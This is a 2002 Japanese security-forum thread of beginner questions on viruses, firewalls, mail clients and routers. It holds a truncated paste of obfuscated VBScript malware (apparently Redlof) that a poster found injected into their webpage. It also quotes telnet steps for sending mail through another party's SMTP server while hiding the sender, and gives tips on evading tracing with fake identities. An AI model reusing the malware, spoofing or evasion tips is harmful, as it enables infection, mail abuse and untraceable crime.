すみません質問させてください 昨日PCを起動したら、しばらくしていきなりメディアプレーヤーが 起動したんです。 なんか変だな、と思ってウィルススキャンしてみたら 「KillAV.C」に感染してる、と表示されました。 5個のファイルが感染していたんですが、そのうち4個は \_RESTORE\ARCHIVE\FSxx.CAB という所にあって、ウィルスソフトで削除も修復もできませんでした。 ググッてみてもヒットしたのはシマンテックの英語サイトのみで ノートンを使っていない自分にはよく解かりません。 だれか解かる方いませんか? 当方の環境は WinMe/IE6.0SP1/OE6/パッチは適用済です 使用ウィルスソフトはBDFEです。
820 :
名無しさん@お腹いっぱい。 :02/12/20 21:45
>816 エロ親父かエロ(略 ウイルスでなくとも、HTMLのレベルで簡単に出来そうだな。 ダミーページ作って、それを読み込ませている間にエロサイトを読み込ませておくとか。 他の言語を使えば、さらにそのサイトのリンクを伝って飛ぶことも可能だから 一見すると自分がそのサイトを見たことあるようにすることもできる。 以前にそういう悪戯ページを見たことある気もするぞ。
>>819 すばやいレスありがとうございます
早速逝ってきます
Windowsが起動しなくなりました、 PCを起動して、しばらくして黒い画面に 「〜〜と言うファイルがないか壊れている可能性があります 新しくインストールしてください」 みたいなメッセージがでてキーボードのEnterをおすと また起動しようとしてそのメッセージがまた出ます。 ウイルスですかね?対処法を教えていただきたいです。
>>822 >ウイルスですかね?
情報不足
>対処法を教えていただきたいです。
OSの再インストールor修復
825 :
名無しさん@お腹いっぱい。 :02/12/20 22:42
UNABOMBERってどこで ダウンロードできますか?
メッセージ確認してきました 次のファイルが存在しないか壊れているため、Windouwsを 起動できませんでした: <Windows root>\system32\hal.dll. 上記のファイルをインストールし直してください と出ます 対処法おねがいします
830 :
名無しさん@お腹いっぱい。 :02/12/20 23:10
これはどうなんでしょうか? トレンドマイクロのスキャンでは何も無し。 シマンテックのスキャンではトロイを1つ検出。 どなたかよろしくです。
WinFAQ見ましたが全然わかりません OSの再インストールしかないんでしょうか? boot.ini の記述が実際の情報と食い違っている場合に発生するらしいです 食い違いを直す方法よかったら説明してもらえませんか?
冬休みだなぁ・・・ ね?
>>831 そこまでわかったのなら、Windows板で該当するOSのスレ探すか、
PC初心者板で聞いてみてね ちなみにここはセキュリティ板
>>833 わかりました
スレ汚しすみませんでした
836 :
名無しさん@お腹いっぱい。 :02/12/21 01:47
>>836 > 各科目の全内容は上記のPDFファイルで確認いただけますが,
> サンプルとしての性質上印刷,編集等はできない設定にしております。
商品なんだから買えば。なんで盗もうとするの?
838 :
名無しさん@お腹いっぱい。 :02/12/21 01:57
一番フリーズ起こりにくいFWってなんだろうか?
>>838 ルータについてるPFW(パケットフィルタリング?)とかどうかな?
(´-`).。oO(回答者も質問者も質が下がるのがこの時期なわけだが……)
>>838 半年ぐらい kerioを使っているけど、これが原因でハングって経験したこと無い。
けど、頻繁にハングアップを起こす FWなんてあるの?
フィルタリングの設定を間違っていて、通信できずにハングしているように見えるだけじゃ??
夏はもっと禿しいべさ
>>842 例えば、kerioならver.2.1.3以降でXPでのスタンバイからの復帰とか。
教えて下さいっ!!(>△<;) 1.メールを出すターゲットを決める。 2.使用するSMTPサーバーを探す。他人もので出すなら、そのSMTPサーバーで 3.25番ポートにtelnetしてSMTPコードで先ず自分宛にメールを出す。自分の IPアドレスやプロバイダーのアドレスがメールヘッダにあったら、ほかのプ ロバイダーからアクセスする。 4.25番ポートにtelnetしてメールを出す。 のtelentの意味も何もかも意味が分かりません!(>□<;) どうか教えて下さい。
てゆうか、せきゅりてぃに関係なかったな、ちっとも。
テルネットってあれだよ、ほら、テレビの通販 テルネットたかた、ってやってるじゃん
850 :
名無しさん@お腹いっぱい。 :02/12/21 16:39
メーラーはEdMaxを使用しているのですが、 最近やたらとウイルスが届いて困っています。 「HTMLメールを表示する」にチェックは入れていませんが、 削除するために選択すると、本文部分に表示されています。 削除してますが、感染は防げているのでしょうか?
>>850 四六時中君のPCの使い方を監視したり
君のPCの状態を見ることはできないから
防げてるかなんて聞かれてもわからない。
心配なら自分でスキャンしような?
でた。真打登場!! 冬厨との大決戦を心待ちにしています。>>藪
>>850 >削除してますが、感染は防げているのでしょうか?
答えは「Yes」。表示されているのはただのTextだから感染はしていない。
以下はEdMaxの作者氏の解説
http://www.edcom.jp/edmax/avirus.html EdMaxもIEコンポーネントを使用している以上、HTMLメールを見る場合の危険性は
充分にある。もしHTMLメールを読む場合は「最も安全」などという意味不明の妄言で
油断することなく、WindowsUpdate等でセキュリティーホールを埋めておく事が肝要。
Telnetで読むのが最強ってのは、漏れだけなんだろうか(死ぬほど不便だが)。
>>855 全然不便じゃない。
配信されたままの形式で保管しないEdMaxなどという腐れメーラよりはるかに優れている。
>>856 読むにはtelnet最強なんすけどね、まぁ。
受信はEdMax使うよか、Becky!使いまするけど。
OEにテキスト化機能が搭載されたんで、完全に移行したいけど、ふんぎりが付きませぬ。
>>857 見るだけとか、テストするだけなら、telnet 以外には使わないよ。
メールが多くなってきて、整理をしたいからとかいう理由だしね。
問題は、APOP だとか SSL だとかいうときはどうしようもないことだ(w
859 :
名無しさん@お腹いっぱい。 :02/12/22 02:29
e-accessのADSL、XPで、ルータはMegaBit Gear TE4121なのですが、 このルータのファイアウォール機能をオフにしたいのですが 設定画面でどのようにしたらよいのでしょうか? よろしくお願いいたします。
>>859 「ルータのファイアウォール機能をオフ」にして何したいんだ?あぁ?
話は、そのあとだ。
オンラインゲームです。 ポートの設定をいくらしてもアップデートに失敗するので、 アップデートの時だけオフにすればできるかなと思いまして。 教えていただけますか?
>>861 アップデトなら、それ相応のものをダウソすりゃええべ。
いや、ゲームのアイコンをダブルクリックして始めようとしたときに 新しいアップデートがあると自動的にDLしてアップデートしてくれるのですが、 ファイアウォール機能が働いてると固まってしまうのです… 前まで使ってたパソコンではモジュラーの穴があったので、アップデートが あった時だけダイヤルアップでアップデートしてたのですが、 新しいパソコンにはモジュラーの穴がなくて… とにかく、このルータのファイアウォールをオフにする設定があるのなら 教えていただけませんか??お願いいたします。
「モジュラーの穴」がなけりゃ、付けりゃいいだろ? いいかげんageすんな!
あぁ、つまり、オフにはできないと。 age続けてしまってすみませんでした。
>856 >配信されたままの形式で保管しないEdMaxなどという腐れメーラよりはるかに優れている。→禿同!
867 :
なぜなぜ? :02/12/22 13:28
ノートンアンチウイルス2002の体験版を インストールし期限がきたのでアンインストールしました。 アンインストールしたにもかかわらずメールの受信の際に zipファイルなどが安全でない為と削除されます。 完全にアンインストールされていないのでしょうか? どなたかご教授ください。
>>859 どうやって、ファイアーウォールの影響で固まると判断できたんだ?
>>867 >>1 >同じ質問を複数の板やスレッドに書き込むマルチポストは嫌われます。
>どの板でも回答をもらえなくなってしまうので、書き込んでせめて1日程度はお待ちください。
870 :
なぜなぜ? :02/12/22 13:53
すみませんでした。
そのゲームのFAQに、 「アップデートのときに固まってしまいます」 →ADSLモデムでのファイアウォール機能が有効になっている可能性があります。 無効にするか、通常のFTP通信で使用するTCP20番、21番ポートを開けて下さい。 と書いてあるからです。
872 :
クランキー :02/12/22 14:19
ノートンのNorton Internet Security 2003について教えていただきたいです。 これを入れるといろいろ不具合が起こる方もいらっしゃられるようなので、 導入するかどうか悩んでいます。 導入前にさかのぼって、hotmailなどに不正アクセスがあったかどうかをしらべることはできるのでしょうか? (hotmailのサーバーに残っている情報を手に入れることができるのかどうかということです) 宜しくお願いします。
>>871 なんか、そのゲームの製作会社ってネットワークの事良く知らないんじゃないの?
それが原因じゃない気がする。
よほどヘボなルータじゃ無ければftpに対応してるはずだけど、確認するにはコマンドプロンプトから
ftp -d ftp.iij.ad.jp
でuser: ftp pass: anonymouse@でログインしてlsを実行してミレ
---> PORT xx.xx.xx.xx,4,91
200 PORT command successful.
が送られて
ディレクトリリストが表示されれば、ルータはftpに対応してるという事だから、ルータのせいじゃない。
>>866 マルチポストも有効である。そのBBSを信用していないことを
明確に示せる。「どうせ、お前らじゃ分からんだろう。」という
意志表示として高く評価できる。もちろんマルチポストの非礼を
あらかじめ詫びてはならない。それでは、単なる「急いでいる人」
になってしまう。それは、教えてクンではない。
質問のタイトルは、「教えてください。」で良い。
タイトルを読んだだけでは「何に関する質問」か全く分からない。
そういう努力は、答える人間にさせれば良いのだ。
とにかく、答える人間が答えやすいように気を使って質問しては
ならない。傲慢で不遜な態度が必須である。
「聞きたいことがあります。」など、プロの仕事であろう。
875 :
名無しさん@お腹いっぱい。 :02/12/22 15:16
2チャンネル覗いてたら、広告らしきメッセージが飛んできた。
これって、よくあるの? IPばればれ (-_-;)
------------------------------------------------------------------
アプリケーション ポップアップ: メッセンジャ サービス : タモチ から ???.???.???.??? へのメッセージ (2002/12/22 14:43:43)
チヲク・: XXXX サ鄲フニョ ニ�オソセネ コクソゥチンエマエル.
シコタホククネュ+クォ+セ゚オソ タ・ョ
http://xxxx.uu.st http://xxxx.uu.st http://xxxx.uu.st http://xxxx.uu.st ソ「スコソ「スコソ「スコソ「スコ スホタフニョ
シコタホタフ セニエマステク・チヲケ゚チサ エンセニチヨステー・ア篌ミサマシフエルク・
チヒシロヌマアクソ・.. ク。コクシシソ・..
シナーナコホ :
ステタロ-シウチ、-チヲセ簓-ー・ョオオアク-シュココ-messenger ソ。シュ シソタクキホシウチ、
>>875 よくあるわけじゃないが既知の問題
IPがわかったところで何かできるというわけではありませんが、何か?
877 :
名無しさん@お腹いっぱい。 :02/12/22 15:35
>876 初めての経験なんでびびっただけです。
878 :
名無しさん@お腹いっぱい。 :02/12/22 17:13
Win2000SP3+ノートンアンチウイルスでファイアーウォールのOutpostを使ってるのですが OSを終了するとき1分以上時間がかかります。 手動でOutpostを終了させてからOSを終了させる時は10秒くらいで終了できるのですが。 これはどうにかならないのでしょうか?
879 :
名無しさん@お腹いっぱい。 :02/12/22 19:56
以下の構成で串させません。 ADSL(Y!BB)−ADSLモデムールーターーPC OS:XP ブラウザ:Opera6.05(build1140) DNS・Gatewayにルーター(192.168.1.1)を設定しています。 この環境で串を使うにはブラウザの設定で串を指定するだけで 良いのでしょうか? 今のところ「プロキシの自動設定に失敗しました」とメッセージが出てきてしまいます。
880 :
名無しさん@お腹いっぱい。 :02/12/22 19:57
(・3・) エェー なんでセキュ板で聞くんだYO! 初級ネットワーク板で聞けYO!
>>881 すみません。
初ネット板逝ってきます。
>>878 うちもOutPostだけど、ログが溜まりすぎると終了が遅くなるようだ。
885 :
名無しさん@お腹いっぱい。 :02/12/23 01:12
pddccdc.tkyoac00.ap.so-net.ne.jp ↑ この情報からこの人がどの都道府県にすんでいる人かわかりますか?
887 :
名無しさん@お腹いっぱい。 :02/12/23 01:23
tkyo
ネタ決定 メシでも食って落ち着け
何だかなぁ。 東京都内のリモホのヤシが、必ずしも東京都内から接続してるとは限らないし。
ping打ったら返ってきたぞ
>>890 pddccdc.tkyoac00.ap.so-net.ne.jp
このひとと思われる人物ががとある非営利団体の会計をやっている人なんです。
この人が最近使い込みをしているのではないかという疑惑が浮上してきて、事情を聞こうと
連絡をとったら入院している母の看病をやっていて病院から一歩も出られない状態だ。
といっているので、看病が終わるのを待っている状態でした。
ところが最近この人物があるウェブページのチャットに匿名で入ってきてROMを続けているので
この人がその会計をやっていた人ではないかと思い確認をとりたいのです。
>>891 動的アドレスでPing打っても、ねぇ。
>>892 設定作りこみスギ。大方ICQでムカツクこと言われたんだろう。
相手が固定IPでない場合、キミは別人に攻撃することになる。
高木写真制作所かぁ。
>>893 確かになんでリアルで解決するべき問題を、こゆ所に持ち込むんでしょね。
>>892 いやいやマジなんだこれが。
刑事事件で訴えることがほぼ決まっているんだけど、
少しでも情報を集めておきたいんですよ。
そのうちどこかの地方新聞に載るかもしれない・・・
数百万くらい残っているはずが300円しか残高かったときには笑ったね
896 :
名無しさん@お腹いっぱい。 :02/12/23 02:34
>>895 ”あるウェブページのチャット”でROMってるだけで
なんでその人だと分かったの?
私怨タンにレスしてまった。。。。。。。。。
そのページが一般公開されていなくて一日に十数人しか見にこないページなんですよ。 そこのチャットが毎週決まった日の決まった時間に行われているんですが、 その日時はページには乗せていなくてメンバーだけが知っているのに 他の日には入ってこないでのそ時間に決まってROMしにくるから その人だろうと言うことになったんだけども確証が得られないからどうしたものかと思って 匿名でROMってる人のホストは必ず *******.tkyoac00.ap.so-net.ne.jp だから同一人物だろうとは思うんですがね。
激しくスレ違いなのでこの辺で消えます。
プロバイダに報告しろ私怨馬鹿。
完全な匿名ってインターネットでは可能なんでしょうか? もし、ないならどんな方法が1番匿名何でしょうか?
>>901 ここでいう匿名というのは、足がつかないという意味でとってください。
名前を伏せるだけじゃなくて、IPなども・・・・
串をさすという意味でもないです。。。
904 :
名無しさん@お腹いっぱい :02/12/23 07:53
ファイアーオールで ICMP Destination Unreachable をブロックしたってでるんですけど何ですか? これはハッカーなんですか? 厨な質問ですまそ
>>903 通信すればなんらかの足跡は残るでしょ
>>904 わからない用語は検索。和訳だけでもなんとなく意味はつかめそうなもんだけど
>>903 途中の踏み台の足跡が消えれば、まぁ匿名になるかもしれん。
>>901 まずプロバイダにつないでる時点でアウトだろ。
>>901 前にも書いたんだけど、
「いざというときには追跡不可能な偽の戸籍・口座を使ってプロバイダに加入する」が手っ取り早い。
そしてそれでどんな犯罪を犯すつもりなんだろう?
>>908 NTTの通信記録とか口座の振込み記録とかATMの防犯カメラとかどうすんだよ。
>>910 > NTTの通信記録とか
もちろんそこから偽の戸籍や口座は使う。
あのー、当たり前だけど、コトが済んだら
住んでる部屋や使った回線は引き払うんだよ?
もしかして家のパソコン使うとか間抜けなこと考えてない?
ま、「現実」世界できちんと匿名になれないような香具師は ネット上でも匿名にはとうていなれやしないってとこかな。
セキュが完璧になるのはいつになるのだろうか (遠い目
携帯のアドレスからこちらの身元がわかることってあるんでしょうか?
>>914 著しく板違いつうか流れ無視な話ですねん。
捨て携帯買え。
質問があります
918 :
名無しさん@お腹いっぱい。 :02/12/23 23:12
>>918 (・3・) エェー PC再起動してみれYO
Sygateを使用しているのですが Traffic Logを見るとRule nameに Allow non-first fragment と表示されBlockされない場合があります これはなんなでしょうか
低レベルで申し訳ないのですが、質問させてもらってよろしいでしょうか。 画像が一部、AD-SIZEとかADとか表示され、見ることができません。 セキュリティとかAgnitum Outpostの設定をいじくってたのですが・・・ で、表示を戻そうと思って設定をもとに戻したのですが見ることができません。 なぜでしょうか?ご教授のほどをよろしくお願いします。
923 :
名無しさん@お腹いっぱい。 :02/12/23 23:23
>>920 しましたが普通でした。
>919
答えてもらえないのでマルチしちゃいました。
>>922 Agnitum OutpostのPlug-insのAds
926 :
ぼるじょあ ◆yBEncckFOU :02/12/23 23:29
(・3・) エェー じゃぁZoneAlarm使えばいいYO! ぼるじょあでも使えるから君みたいな馬鹿でもOK!
(・3・) エェー
Zoneは重くて断念しました
>>924 レスありがとうございます。
Agnitum OutpostのPlug-insのAdsはどちらもチェックを
はずしたのですが、それにもかかわらず見れません。
なぜでしょう??
(・3・) エェー 履歴削除してリロードしてみなYO!
ダメですね。見れません。諦めようかな・・・
933 :
名無しさん@お腹いっぱい。 :02/12/24 01:19
スアーと、メラーシャに感染したんですが どうすればいいんでしょうか? 誰か助けてください。
おまえ、何に感染してるかわかってるならその先も自分で調べろよ。
>>933 sono pasokon wo mado kara sutero
atarashii pasokon wo kae!
936 :
名無しさん@お腹いっぱい。 :02/12/24 05:03
あのう昔気になったんですがパソコンが盗まれて警察がみつけたことがあった らしいんですがそれはパソコン内の製造番号とかを外部(警察)が調べたという ことですか?つまりそれらは外部からでもわかっちゃうものなんですか? ちなみにそれらはどこにはいってるんですか?HD?メモリー?マザー? 長くてすみません でも長い間気になっていたことなんでどうか教えてください。
(・3・) エェー ぼるじょあにもわかるように 文章としてきちんとした体裁をなした日本語で 聞きたいことを正確に表現してYO (・3・) アルェー それってネットワークセキュリチーとなんのかんけいがあるかも教えてYO!
938 :
名無しさん@お腹いっぱい。 :02/12/24 13:30
dyndnsを使ってye.ath.cxにsmtpサバを立ててるんですがmxとかわかんなくてまともに立っているかどうかわかりません。気にするところがあれば教えてください。
guest guest
不覚にもワラタ
943 :
名無しさん@お腹いっぱい。 :02/12/24 17:47
PC板のほうでも書き込んだんですが、インターネットのセキュリティーサイトに急に繋げなくなってしまいました。 ホットメールとかショッピングサイトが見れません。どこも触ってはいないと思うんですが、 ステータスバーのとこにLANのネットワークケーブルが繋がってない、と なってます。これはセキュリティーサイトに行けないのと関係るんでしょうか? どなたか直し方教えてください。
誰か〜日本語の通訳読んできて〜。
冬休みになると日本語の不自由な方が増えるスレはここですか?
ご、ごめんなさい。 実はアメリカからです。PCも日本のはほとんど使った事無いうえに オンチなので、上手く説明できませんが、LANはローカル・エリア・ ネットワークって書いてあります。画面の下にコンピュータが2台つながったような 絵が2つ出てて、そのうちの一つが×になってます。 分かってもらえるでしょうか?それがもしかしたらホットメールが見れないのと 関係があるのかと思ったんですが、どうでしょう? 説明不足なところがあれば、言って下さい。 とにかく必死なので、お願いします!
948 :
名無しさん@お腹いっぱい。 :02/12/24 19:00
>>947 ・どのWebページが見えないのか?
・見れないページはセキュリティサイト、ホットメール、ショッピングサイトだけか?
・OSは何か?
・ネットワーク環境は何か?
・ブラウザは何か?
・トラブルに陥る直前にした操作は何か?
・「LANはローカル・エリ...」 ← わかりません
その他に、
・どこまでが推測でどこまでが事実なのか分からない
・アイコンや設定名がどこを指しているのかわからない
・セキュリティ板で質問するのが適切なのかどうか
すみませーん、ネタでした (^ ^;
^^
>>951 まあ、クリスマスだし女と濃いセックスし終わって機嫌も良いから許してやるよ
>>953 すんまそん、女いなくて1人でオナーニするしかない人はどうすればええのん?
どうでもいいけど、今日はクリスマスイブっすよ・・・
>>954 漏れと一緒にナンパしに逝こっか(らぶ
とりあえず漏れの予定は、明日ヨドバシのバイト女とメシ食うだけですが。
>>955 ひでー振られかたしたんで、最近女性不信になっちまいました(w
なんつーか漏れは消耗品かえ? しばらく引きこもってようかな・・・
飯食いに行く人がうらやますぃ
^^; あれ怒らせちゃいました??
958 :
名無しさん@お腹いっぱい。 :02/12/24 22:45
>>956 漏れも最近、クリスマスを一緒に過ごす予定の女と、ひでー別れ方したんで。
第一声は、「何だかこのシーズンって、人が多すぎて見ていて人酔いしない?」、ですた。
その後プリウスのキーボードがペコペコしすぎて壊れそうって話題で盛り上がって。。。。
ちなみに、あまりかわいくないけど愛嬌あっていい子ですた。
>>958 アンチウィルスのソフトあればスキャン、その後そのソフト作った会社の
サイトで調べるとか、あとはオンラインスキャンしてみるとか
ところでそのリンクは何だろう?
>>959 漏れなんか、「もういいや(w 」ですた・・・
ちなみにかわいいけど、愛嬌無いっつーか、そっけないっつーか
あれ、また泣きたくなってきた
>>958 strangewordは、踏むのは止めるべきキーワードっす。
>>960 漏れ的には、愛嬌ない女がたま〜に見せる笑顔に、グラっとくるんすけどね。
その頻度が少なすぎると、確かに泣きたくなる。。。。。。
>>961 そうです!それなんですよ!たまに見せる笑顔が、もうたまらんのです
その笑顔を見るためにどれだけ我慢すればいいのかわからんですよ・・・
無理に笑わせようとするとバッサリ切られるし
しばがやってたときは住人だったんだが。
>>962 漏れと同じ属性の人が居る。。。。。
そゆ恋愛って苦しいんですけどねん。
んでも、なぜ心をひかれるんでしょね。
>>963 こっちに居るんすか?絡んだ事無いんで遊びたい〜
つか、マジですか?
つかちょい電話落ち。
965 :
名無しさん@お腹いっぱい。 :02/12/24 23:44
/ ̄ ̄ ̄\ / ∧ ∧ \ | ・ ・ | / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ | )●( | < 氏ねよおめーら \ ー ノ \_________ \____/
>>964 きっとピーンと張り詰めたと言うか、気が抜けない緊張状態が続くんで
後には引けない、ってな感じになるんじゃないですかね?
漏れは周りに、ただ単に意地張ってるだけって言われますた・・・
あれ、怒り心頭で雑談っすか?^^;
>>943 環境も何も書かないで答えられるか。
ローカルエリアのアイコンを右クリック→接続。
( ´,_ゝ`)プッ
970 :
名無しさん@お腹いっぱい。 :02/12/25 03:46
恥ずかしながらお尋ねいたします。 ハッカーに取り付かれました。yahooの常時接続です。 生理日の記録まで見られていて困っています。 変質者でしょうか。今のところ実害はないようですが 盗聴もされています。お手洗いの音まで聞いているようですので 充分実害があるともいえましょうか。 メールも全部読んでいます。なぜでしょう。 ドイツ人です。でも偽名をかたりメールがきます。 多重人格でしょうか。のぞき魔で放尿好きで偏執狂だと思うのですが 対処の仕方がわかりません。 ネタじゃないです。プロのストーカーでしょうか。
>>970 がんばって書いたんだろうが、つまらんです。
3点
972 :
名無しさん@お腹いっぱい。 :02/12/25 04:05
>971さん ほんとです。作り話ではありません。 誰も信じてくれないでしょうが、困っているのです。
>>971 ネタにマジレス、
そこまで実害が出てるなら、警察逝け
974 :
名無しさん@お腹いっぱい。 :02/12/25 05:21
>973さん どうもありがと。ネタじゃないです。
975 :
名無しさん@お腹いっぱい。 :02/12/25 06:44
巛巛巛巛巛巛巛彡彡 |::::::: | |:::::::: U \` ´/| / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |::::: u -・=- -・=- < す、すべて計算通りゆーてるやろ?ば、馬鹿か? | (6. U ⌒ ) ・・)'⌒i \________ ィ| ┏━━━┓| /| !. ┃ノ^^^^.i ┃| __/ \\ ┃ヽニニノ┃ノ\ |.| ヽ、ヽ、. ┗━━┛/ \ | | `ヾ、 / !!ヽ ヽヽ、r‐-‐-‐/⌒ヽー- / // `、 ヽ、 ヽ|_,|_,|_,h( ̄.ノヽ / ビシッ // ノ ー-ヽノ| `~`".`´ ´"⌒⌒) // ( ノ^ //人 入_ノ´~ ̄ ノ/ ヽ
こんにちは。いきなりなのですが、私はHPを運営しています。 それで、昨日うちのHPに来てくれた方がウイルスに感染してしまったと報告が ありました。HPに行ってみたのですが下のバーに「実行しましたがエラーが発生 しました」と出ます。 自分は何の事だかよくわからず、とりあえずトレンドマイクロの オンラインウイルススキャンを行いました。するとメッセージで「Trojan Syste m Cleanerが検出され、駆除されました。」と出ました。 これは一体何なんでしょう?駆除されたのでこれでHPに来た人には感染しなく なるのでしょうか?解決策等教えていただきたいのですが・・・。 今まで1年以上やっていてこういう事は初めてなのでちょっと混乱しています。 よろしくお願いします。
977 :
初心者976 :02/12/25 10:05
すいません。上のの続きなのですが、今自分のHPのソースを見たところ見なれない ソースがありました。わたしはHPビルダーで作っています。 ソースをこぴぺしようと思ったのですが異常に長いのでちょっと無理そうです。 始めのほうだけ貼ってみました。 <script language=vbscript> ExeString = "=fiBkSa^oa%AqieMbtm%S^lMbtm%Aa`kbaLbdj%:mle^L^c^`p%?PK%P pOa^ih%PfjIZqd%Lr^>%CegZiu=bpgPq[HFXlq]km%%HFL^q@bf%%HF<kb]m^Je ebbq!DCIed^Fp!DC@n^ZqaFZfh!DCMnhi^cZmb$Ag]On[Cqg\qehg GC:ml^gaPh!Cee^M]ma)PribOmk&Hk>kokkOalnjaGbtmO^mN^ZaP^fm6COH 'Ll^gQaqmCee^%BbebLZme(*MfmOmk9Kb]]Mbii'OaZ]>heE_Fjlmo$MfmOmk) DC\omZop!%5;)LnEbj!MjlLmo%5-MeagN^ZaP^fm*
>>976 アンチウィルスソフトを常駐させておくこと。
HPのソースから該当部分を削除してもう一度アップロードしなおす。
PCが感染 → HPのソースに感染 → アップロード → HP見た人が感染
979 :
初心者976 :02/12/25 10:27
>>978 素早いアドバイスありがとうございます。早速やってみます!
あともう一つ質問なのですが、感染してしまった人はウイルススキャン
で削除すればどうにかなるのでしょうか?
983 :
初心者976 :02/12/25 11:09
>980 他の方でHPに来てくれている方から”REDLOFではないでしょうか”と メールをいただきました。REDLOFの場合の対処も同じですか? >981 ありがとうございます。今は名前が違うのですね。 勝手にいじられたということなのでしょうか?恐ろしいですね。 >982 やってみます!ありがとうございます。
自分のPCからアプローダーに画像を上げる場合、”参照”で ”C:\Documents and Settings\○○○○\デスクトップ”などと指定しますが この○○○○の部分は管理人に知られてしまうのですか? 確かめずに怪しいサイトにアップしてしまいました。 ○○○○には本名を入れています。鬱です。
>>985 ありがとうございました。
画像ファイル名しか判らないと思った俺がバカでした。
987 :
787=797 :02/12/26 00:29
>>800 超遅くなりましたがレスありがとうございます。
同じところからまた新しいメールが来ました。
Fw:greetingsという題でメッセージのソースを覗くと
-----=_NextPart_000_00C2_01BD0D50.5DE622F0
Content-Type: application/x-msdownload;
name="xmas.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="xmas.exe"
などという文字が見えました。
まだ開いてないのですが、xmas.exeとdownloadという文字が気になります。
日本語が出来るのになぜ題が英語?
と思いつつもxmas.exeが見てみたいのです。
プレゼントもらったのに、腰抜けで見れませんでした
ではかっこうわるいので。
ウイルスバスターでは危ないですかね。
Outlook Expressは最新のにアップデートしました。
988 :
名無しさん@お腹いっぱい。 :02/12/26 11:06
質問です。パソコンの中にワームがいるようで ノートンが反応しまくりです。Cドライブをフォーマット して再インストールすればワームも消滅するのでしょうか?
>>988 ネタはよそでやれ。ここでは釣れないよ。
991 :
名無しさん@お腹いっぱい。 :02/12/26 11:24
>>987 怪しいexeファイルは開かないのが基本。
危険すぎる。マシンがどうなってもしらないよ。
>>992 激しく間違ってます。帰りなさい。
氏ね、基地外。
994 :
名無しさん@お腹いっぱい。 :02/12/26 12:55
↑993は粘着ヴァカです。
995 :
名無しさん@お腹いっぱい。 :02/12/26 13:00
誰か新スレ立ててください。
997 :
薮パソユーザー ◇0fQkHdNop2 :02/12/26 13:22
>>993 アーチミチミ、何処がどうおかしいのか具体的に説明してくれないかな。
そうで無いと間違いを指摘したことにはならないのだが。
998 :
名無しさん@お腹いっぱい。 :02/12/26 13:23
999?
んじゃこれでおしまいヽ(´ー`)ノ 1000 ヽ(´ー`)ノヤホゥ
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。